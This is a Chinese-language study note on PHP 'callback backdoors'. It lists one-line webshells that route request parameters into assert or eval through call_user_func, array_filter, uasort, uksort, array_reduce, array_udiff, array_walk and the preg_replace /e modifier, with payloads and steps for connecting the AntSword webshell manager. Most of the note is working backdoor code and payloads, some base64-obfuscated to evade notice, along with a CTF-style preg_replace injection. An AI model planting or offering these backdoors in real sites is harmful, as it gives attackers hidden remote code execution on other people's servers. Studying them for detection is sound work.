call_user_func
call_user_func把第一个参数作为回调函数调用,其余参数是回调函数的参数。
eval在php中不被当作一个函数,是动态执行指令。
$_REQUEST可以接收get post cookie
assert在php7.4及以后用不了了
<?php call_user_func('assert', $_REQUEST['pass']);?pass=phpinfo();------>会把phpinfo();传给assert执行。
<?php call_user_func_array('assert', array($_REQUEST['pass']));
// 把数组中的元素都交给assert
怎么让蚁剑连接呢?
http://127.0.0.1/RCE/a.php?pass=eval($_POST['abc'])
//为什么要加eval?
//当蚁剑发送 POST 请求时,参数 abc 中是一段经过编码的恶意代码(如蚁剑的 payload)。如果没有 eval,这段代码只会被当作普通字符串处理,而不会被执行。
加上 eval 后,$_POST['abc'] 的内容会被当作 PHP 代码动态执行,从而实现远程命令控制。
进一步思考,在平时的php开发中,遇到过的带有回调参数的函数绝不止上面说的两个。这些含有回调参数的函数,其实都有做"回调后门"的潜力。
array_filter
<?php
$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_filter($arr, base64_decode($e));
//给e传值assert,但是代码中有解码base64_decode,所以要先给assert进行base64编码(YXNzZXJ0)array_filter --- 使用回调函数过滤数组的元素,第一个是参数,第二个参数是回调函数。
此时是php7.3的版本,警告说assert不能动态传入
使用5.3版本成功了
uasort
uasort --- 使用用户定义的比较函数对数组进行排序并保持索引关联,第二个参数是回调函数。
<?php
$e = $_REQUEST['e'];
$arr = array('test', $_REQUEST['pass']);
uasort($arr, base64_decode($e));
uksort
uksort --- 使用用户自定义的比较函数对数组中的键名进行排序,必须写键名
<?php
$e = $_REQUEST['e'];
$arr = array('test' => 1, $_REQUEST['pass'] => 2);
uksort($arr, $e);
//payload和uasort一样,因为传的就是key。只是assert可以不用编码。attay_reduce
array_reduce --- 用回调函数迭代地将数组简化为单一的值,第二给是回调函数。
reduce把一个函数作用在一个序列上,这个函数必须接收两个参数,reduce把结果继续和序列的下一个元素做累积计算。
<?php
$e = $_REQUEST['e'];
$arr = array(1);
array_reduce($arr, $e, $_POST['pass']);
//相当于把pass的值追加道arr中
array_udiff
array_udiff --- 用回调函数比较数据来计算数组的差集,回调函数在第三个。
<?php
$e = $_REQUEST['e'];
$arr = array($_POST['pass']);
$arr2 = array(1);
array_udiff($arr, $arr2, $e);
//payload和array_reduce一样preg_replace
preg_replace --- 执行一个正则表达式的搜索和替换。
当使用被弃用的 e 修饰符(preg_replace 的 /e 模式)时, 它允许将匹配的字符串作为 PHP 代码执行,始终使用 eval。
第一个参数是匹配的模式,第二个是更换后的内容,第三个是原内容。
<?php
$string = 'April 15, 2003';
$pattern = '/(\w+) (\d+), (\d+)/i';
$replacement = '${1}1,$3';
echo preg_replace($pattern, $replacement, $string);
?>
//结果 April1,2003深入研究preg_replace \e模式下的代码执行
<?php
function complex($re, $str) {
return preg_replace(
'/(' . $re . ')/ei',//匹配
'strtolower("\\1")',//把匹配到的转为小写,\1引用正则中第一个捕获分组 ( ) 的内容
$str//传入的值
);
}
foreach($_GET as $re => $str) {
echo complex($re, $str). "\n";
}
function getFlag(){
@eval($_GET['cmd']);
}上面假如替换以后是 eval('strtolower("\1")')
.*匹配除换行符以外的所有字符
.*={${phpinfo()}}
re就是.* 能匹配到传入的值{${phpinfo()}}
此时就是eval(strtolower({${phpinfo()}}))
原先的语句: preg_replace('/(' . re . ')/ei', 'strtolower("\\1")', str);
全部匹配 ${}
变成了语句: preg_replace('/(.*)/ei', 'strtolower("\1")', ${phpinfo()});
但是php中会把点替换成下划线
[\s]表示,只要出现空白就匹配
[\S]表示,非空白就匹配
那么它们的组合[\s\S],表示所有的都匹配
"."是不会匹配换行的,所有出现有换行匹配的时候,就习惯使用[\s\S]来完全通配模式。要让代码可以被执行,就是换一个正则表达式让其能够匹配到 {${phpinfo()}}
所以可以使用\S*=${phpinfo()}
还有一个payload:\S*=${getFlag()}&cmd=phpinfo();
eval(strtolower(${getFlag()})),就会调用getFlag(),执行cmd命令
array_walk
array_walk --- 使用用户自定义函数对数组中的每个元素做回调处理
第一个是数组,第二个是回调函数
<?php
$e = $_REQUEST['e'];
$arr = array($_POST['pass'] => '|.*|e',);
array_walk($arr, $e, '');试试e=assert,pass=phpinfo();不行。
pass=phpinfo();是不变的,即$arr ('phpinfo()' => '|.|e')
e=preg_replace
preg_replace('|. |e', 'phpinfo()','')
